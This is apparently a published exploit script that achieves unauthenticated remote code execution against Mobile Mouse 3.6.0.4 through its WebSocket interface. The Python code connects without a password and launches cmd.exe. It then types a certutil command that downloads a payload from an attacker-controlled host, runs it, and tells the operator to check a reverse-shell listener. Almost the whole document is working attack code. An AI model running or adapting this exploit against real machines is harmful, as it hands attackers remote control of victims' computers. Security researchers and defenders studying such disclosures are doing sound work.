# Exploit Title: Mobile Mouse 3.6.0.4 WebSocket Remote code execution
# Date: 06/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 (Build 19044)


'''
Mobile Mouse 3.6.0.4 contains a critical remote code execution
vulnerability through its WebSocket interface.
'''


#!/usr/bin/env python3

import asyncio
import websockets
import uuid
from time import sleep
import sys


target_ip = "192.168.8.105"
port = 35913 # default port
uri = f"ws://{target_ip}:{port}"

lhost = "192.168.8.100"
payload = "shell.exe"


EOR_CHAR = '\x1e'
EOF_CHAR = '\x04'

async def exploit():
    async with websockets.connect(uri) as ws:
        print("[+] WebSocket connected")


        field1 = ""  # password if known
        field2_guid = str(uuid.uuid4()).upper()
        field3_device_type = "Desktop"
        field4_version1 = "2"
        field5_version2 = "2"
        field6_version3_key = "{length=32,bytes=0x" + "00" * 32 + "}"

        connect_message = (
            f"CONNECT{EOR_CHAR}"
            f"{field1}{EOR_CHAR}"
            f"{field2_guid}{EOR_CHAR}"
            f"{field3_device_type}{EOR_CHAR}"
            f"{field4_version1}{EOR_CHAR}"
            f"{field5_version2}{EOR_CHAR}"
            f"{field6_version3_key}{EOF_CHAR}"
        )

        await ws.send(connect_message)
        print(f"[>] Connecting ...")

        try:
            response = await asyncio.wait_for(ws.recv(), timeout=5)
            decoded = response.decode("utf-8", errors="ignore") if
isinstance(response, bytes) else response
            decoded = decoded.strip()

            if "Welcome" in decoded:
                print("[+] CONNECT accepted by server.")
            elif "Please enter a password" in decoded:
                print("[!] Server requires a password. Aborting.")
                sys.exit(0)
            else:
                print(f"[!] Unexpected response: {repr(decoded)}")
        except Exception as e:
            print(f"[!] No response after CONNECT: {e}")
            sys.exit(1)

        await asyncio.sleep(3)

        cmd = "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"
        await ws.send(cmd)
        sleep(3)

        command_payload = f"KEY\x1e116\x1ecertutil -urlcache -split -f
http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe &
C:\\Windows\\Temp\\payload.exe\x1e\x04"
        await ws.send(command_payload)

        print("[+] reverse shell payload sent")

        execute = "KEY\x1e-1\x1eENTER\x1e\x04"
        await ws.send(execute)

        print("[+] Payload executed, check your listener!")


asyncio.run(exploit())